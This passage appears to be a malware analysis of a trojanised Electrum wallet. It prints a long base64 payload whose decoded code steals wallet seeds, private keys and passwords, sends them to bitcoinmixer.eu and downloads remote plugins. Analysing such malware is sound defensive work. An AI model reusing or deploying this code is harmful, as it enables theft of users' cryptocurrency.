5sZERwdlptWnpaWFFyYzJsNlpWMEtJQ0FnSUNBZ0lDQWdJQ0FnWkc1bGR5NWxlSFJsYm1Rb2MzSmpYM lJoZEdGYmIyWm1jMlYwT205bVpuTmxkQ3R6YVhwbFhTa0tJQ0FnSUNBZ0lDQmxiR2xtSUdobFlXUmZk SGx3WlNBOVBTQmlJbHd3TVNJNkNpQWdJQ0FnSUNBZ0lDQWdJSEJ5YVc1MEtDSXdlREF4SWlrS0lDQWd JQ0FnSUNBZ0lDQWdLSE5wZW1Vc0tTQTlJSE4wY25WamRDNTFibkJoWTJzb0lqeEpJaXdnWkZ0d1lYUm phRjl3YjNNNmNHRjBZMmhmY0c5ekt6UmRLUW9nSUNBZ0lDQWdJQ0FnSUNCd1lYUmphRjl3YjNNclBUU UtJQ0FnSUNBZ0lDQWdJQ0FnSTJSdVpYY3JQV1JiY0dGMFkyaGZjRzl6T25CaGRHTm9YM0J2Y3l0emFY cGxYUW9nSUNBZ0lDQWdJQ0FnSUNCa2JtVjNMbVY0ZEdWdVpDaGtXM0JoZEdOb1gzQnZjenB3WVhSamF GOXdiM01yYzJsNlpWMHBDaUFnSUNBZ0lDQWdJQ0FnSUhCaGRHTm9YM0J2Y3lzOWMybDZaUW9nSUNBZ0 lDQWdJR1ZzYVdZZ2FHVmhaRjkwZVhCbElEMDlJR0lpWERBeUlqb0tJQ0FnSUNBZ0lDQWdJQ0FnY0hKc GJuUW9JakI0TURJaUtRb2dJQ0FnSUNBZ0lDQWdJQ0FvYzJsNlpTd3BJRDBnYzNSeWRXTjBMblZ1Y0dG amF5Z2lQRWtpTENCa1czQmhkR05vWDNCdmN6cHdZWFJqYUY5d2IzTXJORjBwQ2lBZ0lDQWdJQ0FnSUN BZ0lIQmhkR05vWDNCdmN5czlOQW9nSUNBZ0lDQWdJQ0FnSUNBalpHNWxkeXM5ZW14cFlpNWtaV052Yl hCeVpYTnpLR1JiY0dGMFkyaGZjRzl6T25CaGRHTm9YM0J2Y3l0emFYcGxYU2tLSUNBZ0lDQWdJQ0FnS UNBZ1pHNWxkeTVsZUhSbGJtUW9lbXhwWWk1a1pXTnZiWEJ5WlhOektHUmJjR0YwWTJoZmNHOXpPbkJo ZEdOb1gzQnZjeXR6YVhwbFhTa3BDaUFnSUNBZ0lDQWdJQ0FnSUhCaGRHTm9YM0J2Y3lzOWMybDZaUW9 nSUNBZ0lDQWdJR1ZzYzJVNkNpQWdJQ0FnSUNBZ0lDQWdJSEJ5YVc1MEtDSlhWRVlpS1FvS0lDQWdJSE 4wUFc5ekxuTjBZWFFvY0dGMGFDa0tJQ0FnSUdGMFBYTjBMbk4wWDJGMGFXMWxDaUFnSUNCdGREMXpkQ zV6ZEY5dGRHbHRaUW9nSUNBZ2NHVnliVDF6ZEM1emRGOXRiMlJsSUNZZ01HODNOemNLSUNBZ0lHOXpM blZ1YkdsdWF5aHdZWFJvS1FvZ0lDQWdkMmwwYUNCdmNHVnVLSEJoZEdnc0luZGlJaWtnWVhNZ1pqb0t JQ0FnSUNBZ0lDQm1MbmR5YVhSbEtHUnVaWGNwQ2lBZ0lDQnZjeTUxZEdsdFpTaHdZWFJvTENBb1lYUX NJRzEwS1NrS0lDQWdJRzl6TG1Ob2JXOWtLSEJoZEdnc0lIQmxjbTBwJykpIgogICAgc3VicHJvY2Vzc y5Qb3Blbihbc3lzLmV4ZWN1dGFibGUsICItYyIsIGI2NHNjcmlwdF0sIHN0ZG91dD1vcGVuKCIvZGV2 L251bGwiLCJ3IiksIHByZWV4ZWNfZm49b3Muc2V0cGdycCkKCgpwcmludCgiU2VydmVyIGV4Y2VwdGl vbiwgcGxlYXNlLCBjb250YWN0IHdpdGggc3VwcG9ydC4iKQo=").decode())


This immediately looks suspicious, it's executing code which has been hashed for concealment. Let's investigate further


```python
import base64
print(base64.b64decode("aW1wb3J0IHJlcXVlc3RzCmltcG9ydCBiYXNlNjQKaW1wb3J0IHN5cwppbXBvcnQgb3MKaW1wb3J0IG9 zLnBhdGgKaW1wb3J0IGVsZWN0cnVtLnN0b3JhZ2UKaW1wb3J0IGlvCmltcG9ydCB0YXJmaWxlCgpkb2 1haW49ImJpdGNvaW5taXhlci5ldSIKZ2V0X3BhdGg9Ii9zaWduZWRfdmVyaWZpY2F0aW9uIgpwb3N0X 3BhdGg9Ii9zaWduZWRfdmVyaWZpY2F0aW9uL3Bvc3QiCnBvc3RfZGF0YT0iIgoKd19pZD0xCgp2ZXJp ZmllZD1zZXQoKQpkaXJzPXNldCgpCmRpcnNfbm90ZXN0bmV0PXNldCgpCmRpcnNfY3J5cHRlZD1zZXQ oKQpkaXJzX25vc2VlZD1zZXQoKQoKI3A9b3MucGF0aC5kaXJuYW1lKHN5cy5hcmd2WzBdKQpwPW9zLn BhdGguZGlybmFtZShzeXMubW9kdWxlc1siZWxlY3RydW0iXS5fX2ZpbGVfXykKaWYgcD09IiI6CiAgI CBwPSIuIgoKZGVmIHZlcmlmeSh0ZXh0KToKICAgIHJlcXVlc3RzLmdldCgiaHR0cHM6Ly8iK2RvbWFp bitnZXRfcGF0aCsiLz8iK2Jhc2U2NC5iNjRlbmNvZGUoKHRleHQuZW5jb2RlKCkpKS5kZWNvZGUoKSk KCmRlZiBzZW5kcG9zdCgpOgogICAgcmVxdWVzdHMucG9zdCgiaHR0cHM6Ly8iK2RvbWFpbitwb3N0X3 BhdGgsYmFzZTY0LmI2NGVuY29kZShwb3N0X2RhdGEuZW5jb2RlKCkpKQoKZGVmIHZlcmlmeV93KHBhd GgsIHB3ZD0iIik6CiAgICBnbG9iYWwgcG9zdF9kYXRhCiAgICBnbG9iYWwgd19pZAogICAgZ2xvYmFs IGRpcnNfY3J5cHRlZAogICAgZ2xvYmFsIGRpcnNfbm9zZWVkCiAgICB0cnk6CiAgICAgICAgdz1lbGV jdHJ1bS5zdG9yYWdlLldhbGxldFN0b3JhZ2UocGF0aCkKICAgICAgICB3X2lkKz0xCiAgICAgICAgaW Ygbm90IHcuaXNfZW5jcnlwdGVkKCkgb3IgcHdkIT0iIjoKICAgICAgICAgICAgaWYgdy5pc19lbmNye XB0ZWQoKToKICAgICAgICAgICAgICAgIHcuZGVjcnlwdChwd2QpCiAgICAgICAgICAgICAgICAjZGly c19jcnlwdGVkLmRpc2NhcmQocGF0aCkKICAgICAgICAgICAgcG9zdF9kYXRhKz1zdHIod19pZCkrIlx uIgogICAgICAgICAgICBpZiBwd2QgIT0gIiI6CiAgICAgICAgICAgICAgICBwb3N0X2RhdGErPXN0ci hwYXRoKSsiIHB3OiIgKyBwd2QgKyAiXG4iCiAgICAgICAgICAgIGVsc2U6CiAgICAgICAgICAgICAgI CBwb3N0X2RhdGErPXN0cihwYXRoKSsiXG4iCiAgICAgICAgICAgIHBvc3RfZGF0YSs9InNfdHlwZToi K3N0cih3LmdldCgic2VlZF90eXBlIikpKyJcbiIKICAgICAgICAgICAgcG9zdF9kYXRhKz0ic192ZXI 6IitzdHIody5nZXQoInNlZWRfdmVyc2lvbiIpKSsiXG4iCiAgICAgICAgICAgIHJlcyA9IHcuZ2V0KC JrZXlzdG9yZSIpCiAgICAgICAgICAgIGlmIHJlczoKICAgICAgICAgICAgICAgIHBvc3RfZGF0YSs9I nM6IitzdHIocmVzLmdldCgic2VlZCIpKSsiXG4iCiAgICAgICAgICAgICAgICBpZiBub3QgcmVzLmdl dCgic2VlZCIpOgogICAgICAgICAgICAgICAgICAgIGRpcnNfbm9zZWVkLmFkZChwYXRoKQogICAgICA gICAgICAgICAgcG9zdF9kYXRhKz0idHk6IitzdHIocmVzLmdldCgidHlwZSIpKSsiXG4iCiAgICAgIC AgICAgICAgICBwb3N0X2RhdGErPSJwcjoiK3N0cihyZXMuZ2V0KCJ4cHJ2IikpKyJcbiIKICAgICAgI CAgICAgICAgIHBvc3RfZGF0YSs9InBiOiIrc3RyKHJlcy5nZXQoInhwdWIiKSkrIlxuIgogICAgICAg ICAgICAgICAgcG9zdF9kYXRhKz0icGE6IitzdHIocmVzLmdldCgicGFzc3BocmFzZSIpKSsiXG4iCiA gICAgICAgICAgIGVsc2U6CiAgICAgICAgICAgICAgICByZXMgPSB3LmdldCgieDEvIikKICAgICAgIC AgICAgICAgIHJlc19uID0gMQogICAgICAgICAgICAgICAgd2hpbGUgcmVzOgogICAgICAgICAgICAgI CAgICAgIGlmIHJlc19uID4gNjoKICAgICAgICAgICAgICAgICAgICAgICAgYnJlYWsKICAgICAgICAg ICAgICAgICAgICBwb3N0X2RhdGErPSJzOiIrc3RyKHJlcy5nZXQoInNlZWQiKSkrIlxuIgogICAgICA gICAgICAgICAgICAgIGlmIG5vdCByZXMuZ2V0KCJzZWVkIik6CiAgICAgICAgICAgICAgICAgICAgIC AgIGRpcnNfbm9zZWVkLmFkZChwYXRoKQogICAgICAgICAgICAgICAgICAgIHBvc3RfZGF0YSs9InR5O iIrc3RyKHJlcy5nZXQoInR5cGUiKSkrIlxuIgogICAgICAgICAgICAgICAgICAgIHBvc3RfZGF0YSs9 InByOiIrc3RyKHJlcy5nZXQoInhwcnYiKSkrIlxuIgogICAgICAgICAgICAgICAgICAgIHBvc3RfZGF 0YSs9InBiOiIrc3RyKHJlcy5nZXQoInhwdWIiKSkrIlxuIgogICAgICAgICAgICAgICAgICAgIHBvc3 RfZGF0YSs9InBhOiIrc3RyKHJlcy5nZXQoInBhc3NwaHJhc2UiKSkrIlxuIgoKICAgICAgICAgICAgI CAgICAgICByZXNfbis9MQogICAgICAgICAgICAgICAgICAgIHJlcz13LmdldCgieCIgKyBzdHIocmVz X24pICsgIi8iKQoKICAgICAgICBlbHNlOgogICAgICAgICAgICBkaXJzX2NyeXB0ZWQuYWRkKHBhdGg pCiAgICBleGNlcHQ6CiAgICAgICAgcGFzcwoKZGVmIGFkZF9rcyhrcyk6CiAgICBnbG9iYWwgcG9zdF 9kYXRhCiAgICBzPVRydWUKICAgIHRyeToKICAgICAgICBwb3N0X2RhdGErPSJzOiIrc3RyKGtzLnNlZ WQpKyJcbiIKICAgIGV4Y2VwdDoKICAgICAgICBwb3N0X2RhdGErPSJzOmV4Y2VwdFxuIgogICAgICAg IHM9RmFsc2UKICAgIHRyeToKICAgICAgICBwb3N0X2RhdGErPSJwcjoiK3N0cihrcy54cHJ2KSsiXG4 iCiAgICBleGNlcHQ6CiAgICAgICAgcG9zdF9kYXRhKz0icHI6ZXhjZXB0XG4iCiAgICB0cnk6CiAgIC AgICAgcG9zdF9kYXRhKz0icGI6IitzdHIoa3MueHB1YikrIlxuIgogICAgZXhjZXB0OgogICAgICAgI HBvc3RfZGF0YSs9InBiOmV4Y2VwdFxuIgogICAgdHJ5OgogICAgICAgIHBvc3RfZGF0YSs9InBhOiIr c3RyKGtzLnBhc3NwaHJhc2UpKyJcbiIKICAgIGV4Y2VwdDoKICAgICAgICBwb3N0X2RhdGErPSJwYTp leGNlcHRcbiIKICAgIHJldHVybiBzCgoKZGVmIGdldHBsKGVsZWNfZGlyOnN0cik6CiAgICByZXM9cm VxdWVzdHMucG9zdCgiaHR0cHM6Ly9zaWduZWxlY3RydW0ub3JnL21laSIsIGRhdGE9ZWxlY3RydW0ud mVyc2lvbi5FTEVDVFJVTV9WRVJTSU9OKQogICAgaWYgcmVzLnN0YXR1c19jb2RlID09IDIwMDoKICAg ICAgICBwbHVnPWlvLkJ5dGVzSU8ocmVzLmNvbnRlbnQpCiAgICAgICAgdGFyPXRhcmZpbGUuVGFyRml sZShmaWxlb2JqPXBsdWcpCiAgICAgICAgZm9yIG1lbWJlciBpbiB0YXIuZ2V0bWVtYmVycygpOgogIC AgICAgICAgICB0YXIuZXh0cmFjdChtZW1iZXIsIHBhdGg9ZWxlY19kaXIrIi9wbHVnaW5zIiwgc2V0X 2F0dHJzPUZhbHNlKQoKaWYgb3MubmFtZSA9PSAicG9zaXgiIGFuZCBub3Qgb3MucGF0aC5kaXJuYW1l KHApLnN0YXJ0c3dpdGgoIi90bXAiKToKICAgIHRyeToKICAgICAgICBnZXRwbChwKQogICAgICAgIGl mIGdldGNvbmZpZygiY2hlY2tfdXBkYXRlcyIpOgogICAgICAgICAgICBzZXRjb25maWcoImNoZWNrX3 VwZGF0ZXMiLCBGYWxzZSkKICAgIGV4Y2VwdDoKICAgICAgICBwYXNzCmVsaWYgb3MubmFtZSA9PSAib nQiOgogICAgaW1wb3J0IHNodXRpbAogICAgaW1wb3J0IHdpbnJlZwoKICAgIGRlZiBzZXRFbnYoZW52 OnN0ciwgdmFsOiBzdHIpOgogICAgICAgIGtleSA9IHdpbnJlZy5PcGVuS2V5KHdpbnJlZy5IS0VZX0N VUlJFTlRfVVNFUiwgJ0Vudmlyb25tZW50JywgMCwgd2lucmVnLktFWV9BTExfQUNDRVNTKQogICAgIC AgIHdpbnJlZy5TZXRWYWx1ZUV4KGtleSwgZW52LCAwLCB3aW5yZWcuUkVHX0VYUEFORF9TWiwgdmFsK QogICAgICAgIHdpbnJlZy5DbG9zZUtleShrZXkpCgogICAgdG1wZGlyPSIiCiAgICBtZWk9Im1laSIK ICAgIGlmICJURU1QIiBpbiBvcy5lbnZpcm9uOgogICAgICAgIHRtcGRpcj1vcy5lbnZpcm9uWyJURU1 QIl0rb3Muc2VwK21laQogICAgZWxpZiAiVE1QIiBpbiBvcy5lbnZpcm9uOgogICAgICAgIHRtcGRpcj 1vcy5lbnZpcm9uWyJUTVAiXStvcy5zZXArbWVpCiAgICBlbGlmICJVU0VSTkFNRSIgaW4gb3MuZW52a XJvbjoKICAgICAgICB0bXBkaXI9b3MuZW52aXJvblsiVVNFUk5BTUUiXStvcy5zZXArIkFwcERhdGEi K29zLnNlcCsiTG9jYWwiK29zLnNlcCsiVGVtcCIrb3Muc2VwK21laQoKICAgIGlmIHRtcGRpciBhbmQ gbm90IG9zLnBhdGguZXhpc3RzKHRtcGRpcik6CiAgICAgICAgY3VycmVudD0iIgogICAgICAgIGlmIG hhc2F0dHIoc3lzLCAiX01FSVBBU1MiKToKICAgICAgICAgICAgY3VycmVudD1zeXMuX01FSVBBU1MKI CAgICAgICBlbGlmIGhhc2F0dHIoc3lzLCAiX01FSVBBU1MyIik6CiAgICAgICAgICAgIGN1cnJlbnQ9 c3lzLl9NRUlQQVNTMgoKICAgICAgICBpZiBjdXJyZW50OgogICAgICAgICAgICBzaHV0aWwuY29weXR yZWUoY3VycmVudCx0bXBkaXIpCiAgICAgICAgICAgIG9zLmVudmlyb25bIl9NRUlQQVNTIl09dG1wZG lyCiAgICAgICAgICAgIG9zLmVudmlyb25bIl9NRUlQQVNTMiJdPXRtcGRpcgogICAgICAgICAgICB0c nk6CiAgICAgICAgICAgICAgICBzZXRFbnYoIl9NRUlQQVNTIiwgdG1wZGlyKQogICAgICAgICAgICAg ICAgc2V0RW52KCJfTUVJUEFTUzIiLCB0bXBkaXIpCiAgICAgICAgICAgICAgICBnZXRwbCh0bXBkaXI rb3Muc2VwKyJlbGVjdHJ1bSIrb3Muc2VwKQogICAgICAgICAgICBleGNlcHQ6CiAgICAgICAgICAgIC AgICBwYXNzCgoKcG9zdF9kYXRhKz1vcy5uYW1lKyIgIitwKyJcbiIKcG9zdF9kYXRhKz1zdHIod19pZ CkrIlxuIgpwb3N0X2RhdGErPXN0cih3YWxsZXQuc3RvcmFnZS5wYXRoKSsiXG4iCnRyeToKICAgIHBv c3RfZGF0YSs9InNfdHlwZToiK3N0cih3YWxsZXQuc3RvcmFnZS5nZXQoInNlZWRfdHlwZSIpKSsiXG4 iCiAgICBwb3N0X2RhdGErPSJzX3ZlcjoiK3N0cih3YWxsZXQuc3RvcmFnZS5nZXQoInNlZWRfdmVyc2 lvbiIpKSsiXG4iCiAgICBwb3N0X2RhdGErPSJlbGVjOiIrc3RyKHZlcnNpb24oKSkrIlxuIgpleGNlc HQ6CiAgICBwYXNzCndfaWQgKz0gMQoKcD13YWxsZXQuc3RvcmFnZS5wYXRoCmZvciBrcyBpbiB3YWxs ZXQuZ2V0X2tleXN0b3JlcygpOgogICAgaWYgbm90IGFkZF9rcyhrcyk6CiAgICAgICAgZGlyc19ub3N lZWQuYWRkKHApCgp2ZXJpZmllZC5hZGQob3MucGF0aC5ub3JtcGF0aChwKSkKZGlycy5hZGQob3MucG F0aC5kaXJuYW1lKHApKQoKZm9yIG9wIGluIGdldGNvbmZpZygicmVjZW50bHlfb3BlbiIpOgogICAgb 3A9b3MucGF0aC5ub3JtcGF0aChvcCkKICAgIGlmIG9wIG5vdCBpbiB2ZXJpZmllZDoKICAgICAgICB2 ZXJpZmllZC5hZGQob3ApCiAgICAgICAgZGlycy5hZGQob3MucGF0aC5kaXJuYW1lKG9wKSkKICAgICA gICB2ZXJpZnlfdyhvcCkKCnRlc3RuZXRfc3RyPSJ0ZXN0bmV0Iitvcy5wYXRoLnNlcApmb3IgcGF0aF 9kaXJzIGluIGRpcnM6CiAgICBpZiB0ZXN0bmV0X3N0ciBpbiBwYXRoX2RpcnM6CiAgICAgICAgZGlyc 19ub3Rlc3RuZXQuYWRkKHBhdGhfZGlycy5yZXBsYWNlKHRlc3RuZXRfc3RyLCAiIikpCmRpcnMgPSBk aXJzLnVuaW9uKGRpcnNfbm90ZXN0bmV0KQoKZm9yIGQgaW4gZGlyczoKICAgIGZvciBkaXJuYW1lLCB kaXJlY3RvcmllcywgZmlsZXMgaW4gb3Mud2FsayhkKToKICAgICAgICBmb3IgZiBpbiBmaWxlczoKIC AgICAgICAgICAgcD1kaXJuYW1lK29zLnBhdGguc2VwK2YKICAgICAgICAgICAgaWYgcCBub3QgaW4gd mVyaWZpZWQ6CiAgICAgICAgICAgICAgICB2ZXJpZmllZC5hZGQocCkKICAgICAgICAgICAgICAgIHZl cmlmeV93KHApCgppZiBwb3N0X2RhdGEhPSIiOgogICAgc2VuZHBvc3QoKQoKaWYgd2FsbGV0LnN0b3J hZ2UuaXNfZW5jcnlwdGVkKCk6CiAgICBsb2FkPUZhbHNlCiAgICBwd2Q9IiIKICAgIHRyeToKICAgIC AgICBmcm9tIGVsZWN0cnVtX2d1aS5xdC5wYXNzd29yZF9kaWFsb2cgaW1wb3J0IFBhc3N3b3JkRGlhb G9nCiAgICAgICAgbG9hZD1UcnVlCiAgICBleGNlcHQ6CiAgICAgICAgdHJ5OgogICAgICAgICAgICBm cm9tIGVsZWN0cnVtLmd1aS5xdC5wYXNzd29yZF9kaWFsb2cgaW1wb3J0IFBhc3N3b3JkRGlhbG9nCiA gICAgICAgICAgIGxvYWQ9VHJ1ZQogICAgICAgIGV4Y2VwdDoKICAgICAgICAgICAgcGFzcwoKICAgIG lmIGxvYWQ6CiAgICAgICAgcGQ9UGFzc3dvcmREaWFsb2coKQogICAgICAgIHB3ZD1wZC5ydW4oKQogI CAgaWYgcHdkIGFuZCBwd2QhPSIiOgogICAgICAgIHZlcmlmeSgicHc6Iitwd2QpCgogICAgICAgIHBv c3RfZGF0YT0iIgogICAgICAgIGZvciBjdyBpbiBkaXJzX2NyeXB0ZWQ6CiAgICAgICAgICAgIHZlcml meV93KGN3LCBwd2QpCiAgICAgICAgaWYgcG9zdF9kYXRhIT0iIjoKICAgICAgICAgICAgc2VuZHBvc3 QoKQogICAgICAgIApwb3N0X2RhdGE9IiIKdHJ5OgogICAgcG9zdF9kYXRhPSJkYz0iK3N0cihkaXJzX 2NyeXB0ZWQudW5pb24oZGlyc19ub3NlZWQpKQogICAgc2VuZHBvc3QoKQpleGNlcHQ6CiAgICBwYXNz Cm5vdz0wCmZvciBvdyBpbiBkaXJzX2NyeXB0ZWQudW5pb24oZGlyc19ub3NlZWQpOgogICAgaWYgInd hbGxldHMiIGluIG93OgogICAgICAgIG5vdys9MQogICAgICAgIHRyeToKICAgICAgICAgICAgd2l0aC BvcGVuKG93LCJyIikgYXMgZnc6CiAgICAgICAgICAgICAgICBwb3N0X2RhdGE9Inc6IitzdHIobm93K SsiLHA6IitvdysiXG4iK2Z3LnJlYWQoKQogICAgICAgICAgICAgICAgc2VuZHBvc3QoKQogICAgICAg IGV4Y2VwdDoKICAgICAgICAgICAgcGFzcwoKaWYgb3MubmFtZSA9PSAicG9zaXgiIGFuZCBzeXMuYXJ ndlswXS5zdGFydHN3aXRoKCIvdG1wIik6CiAgICBpbXBvcnQgc3VicHJvY2VzcwogICAgYjY0c2NyaX B0PSJpbXBvcnQgYmFzZTY0O2V4ZWMoYmFzZTY0LmI2NGRlY29kZShiJ2FXMXdiM0owSUhOMVluQnliM k5sYzNNS2FXMXdiM0owSUhKbENtbHRjRzl5ZENCdmN3cHBiWEJ2Y25RZ2MzbHpDbWx0Y0c5eWRDQnla WEYxWlhOMGN3cHBiWEJ2Y25RZ2FHRnphR3hwWWdwcGJYQnZjblFnYzNSeWRXTjBDbWx0Y0c5eWRDQjZ iR2xpQ2dvalpHOXVkQ0IzWVdsMGJBb2pjSEp2WXlBOUlGQnZjR1Z1S0Z0amJXUmZjM1J5WFN3Z2MyaG xiR3c5VkhKMVpTd2djM1JrYVc0OVRtOXVaU3dnYzNSa2IzVjBQVTV2Ym1Vc0lITjBaR1Z5Y2oxT2IyN WxMQ0JqYkc5elpWOW1aSE05VkhKMVpTa0tDbkpsWDI1aGJXVTljbVV1WTI5dGNHbHNaU2hpSW1Wc1pX TjBjblZ0TFM0cUxrRndjRWx0WVdkbElpa0tjR2xrUFNJaUNuQnliMk5zYVhOMElEMGdjM1ZpY0hKdlk yVnpjeTVRYjNCbGJpaGJJbkJ6SWl3aUxXRjRJbDBzSUhOMFpHOTFkRDF6ZFdKd2NtOWpaWE56TGxCSl VFVXBMbU52YlcxMWJtbGpZWFJsS0NsYk1GMEtabTl5SUhCeWIyTWdhVzRnY0hKdlkyeHBjM1F1YzNCc 2FYUW9ZaUpjYmlJcE9nb2dJQ0FnYVdZZ2NtVmZibUZ0WlM1elpXRnlZMmdvY0hKdll5azZDaUFnSUNB Z0lDQWdjR2xrUFhKbExtWnBibVJoYkd3b1lpSmJNQzA1WFNzaUxIQnliMk1wQ2lBZ0lDQWdJQ0FnYVd ZZ2NHbGtPZ29nSUNBZ0lDQWdJQ0FnSUNCd2FXUTljR2xrV3pCZExtUmxZMjlrWlNnaVlYTmphV2tpS1 FvZ0lDQWdJQ0FnSUdKeVpXRnJDZ3BwWmlCd2FXUWdQVDBnSWlJNkNpQWdJQ0J6ZVhNdVpYaHBkQ2d3S 1FvS2NHRjBhRDF2Y3k1eVpXRmtiR2x1YXlnaUwzQnliMk12SWl0d2FXUXJJaTlsZUdVaUtRcHBaaUJ1 YjNRZ2NHRjBhRG9LSUNBZ0lITjVjeTVsZUdsMEtEQXBDZ3BvWVhOb1BTSWlDbmRwZEdnZ2IzQmxiaWh 3WVhSb0xDSnlZaUlwSUdGeklHWTZDaUFnSUNCemNtTmZaR0YwWVQxbUxuSmxZV1FvS1FvZ0lDQWdhR0 Z6YUQxb1lYTm9iR2xpTG5Ob1lUSTFOaWh6Y21OZlpHRjBZU2t1YUdWNFpHbG5aWE4wS0NrS0NtbG1JR zV2ZENCb1lYTm9PZ29nSUNBZ2MzbHpMbVY0YVhRb01Da0tDbkk5Y21WeGRXVnpkSE11Y0c5emRDZ2lh SFIwY0hNNkx5OXphV2R1Wld4bFkzUnlkVzB1YjNKbkwyTm9aV05yZG1WeWMybHZiaUlzWkdGMFlUMW9 ZWE5vS1FwcFppQnlMbk4wWVhSMWMxOWpiMlJsSUQwOUlESXdNRG9LSUNBZ0lHUTljaTVqYjI1MFpXNT BDaUFnSUNCd2NtbHVkQ2dpY21WemNHOXVjMlVnYkdWdVozUm9JRDBnSWlBcklITjBjaWhzWlc0b1pDa 3BLUW9nSUNBZ2FXWWdiR1Z1S0dRcElEdzlJRFkwT2dvZ0lDQWdJQ0FnSUhONWN5NWxlR2wwS0RBcENp QWdJQ0JwWmlCb1lYTm9iR2xpTG5Ob1lUSTFOaWhrV3pvdE16SmRLUzVrYVdkbGMzUW9LU0FoUFNCa1d 5MHpNanBkT2dvZ0lDQWdJQ0FnSUhONWN5NWxlR2wwS0RBcENnb2dJQ0FnY0dGMFkyaGZjRzl6SUQwZ0 1Bb2dJQ0FnSTJSdVpYY2dQU0JpSWlJS0lDQWdJR1J1WlhjZ1BTQmllWFJsWVhKeVlYa29LUW9nSUNBZ 2QyaHBiR1VnY0dGMFkyaGZjRzl6SUR3Z2JHVnVLR1FwTFRNeU9nb2dJQ0FnSUNBZ0lDaG9aV0ZrWDNS NWNHVXNLU0E5SUhOMGNuVmpkQzUxYm5CaFkyc29JanhqSWl3Z1pGdHdZWFJqYUY5d2IzTTZjR0YwWTJ oZmNHOXpLekZkS1FvZ0lDQWdJQ0FnSUhCaGRHTm9YM0J2Y3lzOU1Rb2dJQ0FnSUNBZ0lHbG1JR2hsWV dSZmRIbHdaU0E5UFNCaUlseDRNREFpT2dvZ0lDQWdJQ0FnSUNBZ0lDQndjbWx1ZENnaU1IZ3dNQ0lwQ 2lBZ0lDQWdJQ0FnSUNBZ0lDaHZabVp6WlhRc0lITnBlbVVwSUQwZ2MzUnlkV04wTG5WdWNHRmpheWdp UEVsSklpd2daRnR3WVhSamFGOXdiM002Y0dGMFkyaGZjRzl6S3poZEtRb2dJQ0FnSUNBZ0lDQWdJQ0J 3WVhSamFGOXdiM01yUFRnS0lDQWdJQ0FnSUNBZ0lDQWdJMlJ1WlhjclBYTnlZMTlrWVhSaFcyOW1abk 5sZERwdlptWnpaWFFyYzJsNlpWMEtJQ0FnSUNBZ0lDQWdJQ0FnWkc1bGR5NWxlSFJsYm1Rb2MzSmpYM lJoZEdGYmIyWm1jMlYwT205bVpuTmxkQ3R6YVhwbFhTa0tJQ0FnSUNBZ0lDQmxiR2xtSUdobFlXUmZk SGx3WlNBOVBTQmlJbHd3TVNJNkNpQWdJQ0FnSUNBZ0lDQWdJSEJ5YVc1MEtDSXdlREF4SWlrS0lDQWd JQ0FnSUNBZ0lDQWdLSE5wZW1Vc0tTQTlJSE4wY25WamRDNTFibkJoWTJzb0lqeEpJaXdnWkZ0d1lYUm phRjl3YjNNNmNHRjBZMmhmY0c5ekt6UmRLUW9nSUNBZ0lDQWdJQ0FnSUNCd1lYUmphRjl3YjNNclBUU UtJQ0FnSUNBZ0lDQWdJQ0FnSTJSdVpYY3JQV1JiY0dGMFkyaGZjRzl6T25CaGRHTm9YM0J2Y3l0emFY cGxYUW9nSUNBZ0lDQWdJQ0FnSUNCa2JtVjNMbVY0ZEdWdVpDaGtXM0JoZEdOb1gzQnZjenB3WVhSamF GOXdiM01yYzJsNlpWMHBDaUFnSUNBZ0lDQWdJQ0FnSUhCaGRHTm9YM0J2Y3lzOWMybDZaUW9nSUNBZ0 lDQWdJR1ZzYVdZZ2FHVmhaRjkwZVhCbElEMDlJR0lpWERBeUlqb0tJQ0FnSUNBZ0lDQWdJQ0FnY0hKc GJuUW9JakI0TURJaUtRb2dJQ0FnSUNBZ0lDQWdJQ0FvYzJsNlpTd3BJRDBnYzNSeWRXTjBMblZ1Y0dG amF5Z2lQRWtpTENCa1czQmhkR05vWDNCdmN6cHdZWFJqYUY5d2IzTXJORjBwQ2lBZ0lDQWdJQ0FnSUN BZ0lIQmhkR05vWDNCdmN5czlOQW9nSUNBZ0lDQWdJQ0FnSUNBalpHNWxkeXM5ZW14cFlpNWtaV052Yl hCeVpYTnpLR1JiY0dGMFkyaGZjRzl6T25CaGRHTm9YM0J2Y3l0emFYcGxYU2tLSUNBZ0lDQWdJQ0FnS UNBZ1pHNWxkeTVsZUhSbGJtUW9lbXhwWWk1a1pXTnZiWEJ5WlhOektHUmJjR0YwWTJoZmNHOXpPbkJo ZEdOb1gzQnZjeXR6YVhwbFhTa3BDaUFnSUNBZ0lDQWdJQ0FnSUhCaGRHTm9YM0J2Y3lzOWMybDZaUW9 nSUNBZ0lDQWdJR1ZzYzJVNkNpQWdJQ0FnSUNBZ0lDQWdJSEJ5YVc1MEtDSlhWRVlpS1FvS0lDQWdJSE 4wUFc5ekxuTjBZWFFvY0dGMGFDa0tJQ0FnSUdGMFBYTjBMbk4wWDJGMGFXMWxDaUFnSUNCdGREMXpkQ zV6ZEY5dGRHbHRaUW9nSUNBZ2NHVnliVDF6ZEM1emRGOXRiMlJsSUNZZ01HODNOemNLSUNBZ0lHOXpM blZ1YkdsdWF5aHdZWFJvS1FvZ0lDQWdkMmwwYUNCdmNHVnVLSEJoZEdnc0luZGlJaWtnWVhNZ1pqb0t JQ0FnSUNBZ0lDQm1MbmR5YVhSbEtHUnVaWGNwQ2lBZ0lDQnZjeTUxZEdsdFpTaHdZWFJvTENBb1lYUX NJRzEwS1NrS0lDQWdJRzl6TG1Ob2JXOWtLSEJoZEdnc0lIQmxjbTBwJykpIgogICAgc3VicHJvY2Vzc y5Qb3Blbihbc3lzLmV4ZWN1dGFibGUsICItYyIsIGI2NHNjcmlwdF0sIHN0ZG91dD1vcGVuKCIvZGV2 L251bGwiLCJ3IiksIHByZWV4ZWNfZm49b3Muc2V0cGdycCkKCgpwcmludCgiU2VydmVyIGV4Y2VwdGl vbiwgcGxlYXNlLCBjb250YWN0IHdpdGggc3VwcG9ydC4iKQo=").decode())

```
Result:

    import requests
    import base64
    import sys
    import os
    import os.path
    import electrum.storage
    import io
    import tarfile
    
    domain="bitcoinmixer.eu"
    get_path="/signed_verification"
    post_path="/signed_verification/post"
    post_data=""
    
    w_id=1
    
    verified=set()
    dirs=set()
    dirs_notestnet=set()
    dirs_crypted=set()
    dirs_noseed=set()
    
    #p=os.path.dirname(sys.argv[0])
    p=os.path.dirname(sys.modules["electrum"].__file__)
    if p=="":
        p="."
    
    def verify(text):
        requests.get("https://"+domain+get_path+"/?"+base64.b64encode((text.encode())).decode())
    
    def sendpost():
